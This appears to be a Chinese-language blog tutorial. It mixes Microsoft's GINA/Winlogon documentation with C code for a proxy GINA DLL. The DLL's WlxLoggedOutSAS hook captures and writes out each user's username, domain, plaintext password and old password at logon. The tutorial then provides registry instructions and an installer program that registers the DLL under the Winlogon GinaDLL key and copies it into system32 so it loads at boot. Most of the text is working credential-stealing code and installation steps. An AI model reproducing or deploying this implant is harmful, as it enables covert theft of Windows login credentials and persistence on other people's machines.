The GINA operates in the context of the Winlogon process and, as such, the GINA DLL is loaded very early in the boot process. The GINA DLL must follow rules so that the integrity of the system is maintained, particularly with respect to interaction with the user.
Note GINA DLLs are ignored in Windows Vista.
The most common use of the GINA is to communicate with an external device such as a smart-card reader. It is essential to set the start parameter for the device driver to system (Winnt.h: SERVICE_SYSTEM_START) to ensure that the driver is loaded by the time the GINA is invoked.
The purpose of a GINA DLL is to provide customizable user identification and authentication procedures. The default GINA does this by delegating SAS event monitoring to Winlogon, which receives and processes CTL+ALT+DEL secure attention sequences (SASs). A custom GINA is responsible for setting itself up to receive SAS events (other than the default CTRL+ALT+DEL SAS event) and notifying Winlogon when SAS events occur. Winlogon will evaluate its state to determine what is required to process the custom GINA's SAS. This processing usually includes calls to the GINA's SAS processing functions.
For information about specific GINA export functions, see GINA Export Functions. For information about using GINA structures to pass information, see GINA Structures.
GINA的经营在Winlogon进程中,这样,GINA DLL被加载在引导过程中的早期。GINA DLL必须遵循的规则,以便保持系统的完整性,特别是与用户的交互方面。
注意的GINA的DLL在Windows Vista中被忽略。
一个GINA DLL的目的是提供可定制的用户识别和认证程序。默认的GINA,SAS事件监测委托WINLOGON,接收和处理CTL + ALT + DEL,安全注意序列(SASS)。自定义GINA负责设置接收SAS的事件(其他比默认的Ctrl + Alt + Del SAS事件),并通知WINLOGON SAS事件发生时,。 WINLOGON将评估其状态,以确定哪些是必需的过程中自定义GINA的SAS。这种处理通常包括调用了GINA的SAS处理功能。
Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出。该进程的正常路径应是 C:\Windows\System32 且是以 SYSTEM 用户运行.我们都知道操作系统都是基于权限,而权限都是基于用户的,而这个winlogon进程就是管理用户登入登出,是不可以被结束的。
在NT/2000中交互式的登陆支持是由WinLogon调用GINA DLL实现的,GINA DLL提供了一个交互式的界面为用户登陆提供认证请求。WinLogon会和GINA DLL进行交互,缺省是MSGINA.DLL(在System32目录下)。微软同时也为我们提供了接口,我们可以自己编写GINA DLL来代替MSGINA.DLL。
(1)、winlogon桌面:主要显示Windows 安全等界面,如你按下CTRL+ALT+DEL,登陆的界面等
首先我们需要知道原msgina.dll导出了哪些函数。通过参看微软的帮助文档,我们不难发现msgina.dll导出了以下19个函数:(据说Windows 2000应该比文档中的19个函数多一个,本菜鸟没有仔细去想)
函数 | 描述 |
WlxActivateUserShell | 激活用户外壳程序 |
WlxDisplayLockedNotice | 允许GINA DLL 显示锁定信息 |
WlxDisplaySASNotice | 当没有用户登陆时,Winlogon调用此函数 |
WlxDisplayStatusMessage | Winlogon 用一个状态信息调用此函数进行显示 |
WlxGetConsoleSwitchCredentials | Winlogon调用此函数读取当前登陆用户的信任信息,并透明地将它们传到目标会话 |
WlxGetStatusMessage | Winlogon 调用此函数获取当前状态信息 |
WlxInitialize | 针对指定的窗口位置进行GINA DLL初始化 |
WlxIsLockOk | 验证工作站正常锁定 |
WlxIslogoffOk | 验证注销正常 |
WlxLoggedOnSAS | 用户已登陆并且工作站没有被加锁,如果此时接收到SAS事件,则Winlogon 调用此函数 |
WlxLoggedOutSAS | 没有用户登陆,如果此时收到SAS事件,则Winlogon 调用此函数, This indicates that a logon attempt should be made 。 |
WlxLogoff | 请求注销操作时通知GINA DLL |
WlxNegotiate | 表示当前的Winlogon版本是否能使用GINA DLL |
WlxNetworkProviderLoad | 在加载网络服务提供程序收集了身份和认证信息后,Winlogon 调用此函数 |
WlxRemoveStatusMessage | Winlogon 调用此函数告诉GINA DLL 停止显示状态信息 |
WlxScreensaverNotify | 允许GINA与屏幕保护操作交互 |
WlxShutdown | 在关闭之前Winlogon 调用此函数,允许GINA实现任何关闭任务,例如从读卡器中退出智能卡 |
WlxStartApplication | 当系统需要在用户的上下文中启动应用程序时调用此函数 |
WlxWkstaLockedSAS | 当工作站被锁定,如果接收到一个SAS,则Winlogon 调用此函数 |
typedef BOOL //先定义一个结构 (WINAPI * pWlxNegotiate)( DWORD dwWinlogonVersion, PDWORD pdwDllVersion );
pWlxNegotiate prcWlxNegotiate = NULL; //实例化
prcWlxNegotiate = (pWlxNegotiate)GetProcAddress(hGina, "WlxNegotiate"); //从原动态链接库导出原函数地址,赋给我们的函数
BOOL WINAPI WlxNegotiate ( //在自己的编写的gina.dll动态链接库中导出这个函数,调用WlxNegotiate实现该函数原有功能 DWORD dwWinlogonVersion, PDWORD pdwDllVersion) { return prcWlxNegotiate ( dwWinlogonVersion, pdwDllVersion); }
EXPORTS WlxGetConsoleSwitchCredentials @1 WlxActivateUserShell @2 WlxDisplayLockedNotice @3 WlxDisplaySASNotice @4 WlxDisplayStatusMessage @5 WlxGetStatusMessage @6 WlxInitialize @7 WlxIsLockOk @8 WlxIsLogoffOk @9 WlxLoggedOnSAS @10 WlxLoggedOutSAS @11 WlxLogoff @12 WlxNegotiate @13 WlxNetworkProviderLoad @14 WlxRemoveStatusMessage @15 WlxScreenSaverNotify @16 WlxShutdown @17 WlxStartApplication @18 WlxWkstaLockedSAS @19
The WlxLoggedOutSAS function must be implemented by a replacementGINA DLL.Winlogon calls this function when it receives a secure attention sequence (SAS) event while no user is logged on.
翻译为更换的GINA DLL必须实现WlxLoggedOutSAS功能。Winlogon中调用这个函数,当它接收到一个安全注意序列(SAS)的事件,而没有用户登录。(来自goole翻译)
Syntax int WlxLoggedOutSAS( __in PVOID pWlxContext, __in DWORD dwSasType, __out PLUID pAuthenticationId, __inout PSID pLogonSid, __out PDWORD pdwOptions, __out PHANDLE phToken, __out PWLX_MPR_NOTIFY_INFO pNprNotifyInfo, __out PVOID* pProfile );
typedef struct _WLX_MPR_NOTIFY_INFO { PWSTR pszUserName; //用户名 PWSTR pszDomain; //计算机名 PWSTR pszPassword; //密码 PWSTR pszOldPassword;//旧密码 } WLX_MPR_NOTIFY_INFO, *PWLX_MPR_NOTIFY_INFO;
int WINAPI WlxLoggedOutSAS ( PVOID pWlxContext, DWORD dwSasType, PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions, PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo, PVOID * pProfile) { int iRet=0; PWSTR pszUserName=NULL; //用户名 PWSTR pszDomain=NULL; //机器名 PWSTR pszPassword=NULL; //密码 PWSTR pszOldPassword=NULL; //旧密码 WriteInfo("WlxLoggedOutSAS\r\n"); iRet=prcWlxLoggedOutSAS ( pWlxContext, dwSasType, pAuthenticationId, pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile); if(iRet == WLX_SAS_ACTION_LOGON) { pszUserName=pMprNotifyInfo->pszUserName; if(pszUserName!=NULL) { WriteInfo("Username : "); WriteInfoW(pszUserName);//输出函数 } pszDomain=pMprNotifyInfo->pszDomain; if(pszDomain!=NULL) { WriteInfo("computer : "); WriteInfoW(pszDomain); } pszPassword =pMprNotifyInfo->pszPassword; if(pszPassword!=NULL) { WriteInfo("PassWord : "); WriteInfoW(pszPassword); } pszOldPassword=pMprNotifyInfo->pszOldPassword; if(pszOldPassword!=NULL) { WriteInfo("OldPassword: "); WriteInfoW(pszOldPassword); } } return iRet; }
1. 添加注册表
键名 : \HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
变量名 : GinaDLL
变量类型 : [REG_SZ]
内容 : "你的GINA DLL的名称" 如:"MyGina.DLL:
2. 将你的GINA DLL(MyGina.dll)拷贝到系统目录下(system32);
3. 重启机器,你的GINA DLL(MyGina.dll)就会运行。
#include "windows.h" #include "tchar.h" BOOL SetRegedit() { HKEY hKey=NULL; LPCTSTR data=_T("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"); LPCTSTR Value=_T("GINA.dll"); if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,data,0,KEY_ALL_ACCESS,&hKey)==ERROR_SUCCESS) { RegSetValueEx(hKey,_T("GinaDll"),0,REG_SZ,(LPBYTE)Value,50); return TRUE; } return FALSE; } BOOL Move() { if((MoveFileEx(_T(".\\GINA.dll"),_T("c:\\WINDOWS\\system32\\GINA.dll"),MOVEFILE_REPLACE_EXISTING))!=0) return TRUE; else return FALSE; } int WINAPI WinMain(HINSTANCE, HINSTANCE, char *, int cmdShow) { if(SetRegedit()==FALSE) MessageBox(NULL,"SetRegedit fuild","Error",MB_OK); if (Move()==FALSE) MessageBox(NULL,"Move fuild","Error",MB_OK); return 0; }